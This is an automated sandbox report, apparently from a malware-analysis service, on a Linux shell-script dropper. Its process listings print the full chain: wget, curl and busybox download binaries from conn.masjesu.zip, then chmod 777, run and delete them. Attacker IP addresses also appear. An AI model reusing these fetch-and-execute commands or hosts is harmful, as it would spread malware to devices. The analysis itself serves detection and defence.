Analysis Overview
SHA256
d44ff432211daf9c1be45ff0a6c526870a8a142de999a752c9c35c569a8bd6c9
Threat Level: Shows suspicious behavior
The file 1fe6de8ea9975b311fc0e7781eb48271.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:07
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
debian9-armhf-20240611-en
Max time kernel
148s
Max time network
9s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
debian9-mipsbe-20240611-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | N/A |
| N/A | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | N/A |
| N/A | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | N/A |
| N/A | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | N/A |
| N/A | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | N/A |
| N/A | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | N/A |
| N/A | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | N/A |
| N/A | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | N/A |
| N/A | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | N/A |
| N/A | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | N/A |
| N/A | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | N/A |
| N/A | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | N/A |
| N/A | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | N/A |
| N/A | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | N/A |
| N/A | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | N/A |
| N/A | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/chmod
[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/rm
[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/chmod
[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/rm
[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/chmod
[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/rm
[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/chmod
[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/rm
[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/chmod
[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/rm
[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/chmod
[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/rm
[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/chmod
[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/rm
[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/chmod
[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/rm
[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/chmod
[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/rm
[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/chmod
[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/rm
[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/chmod
[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/rm
[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/chmod
[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/rm
[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
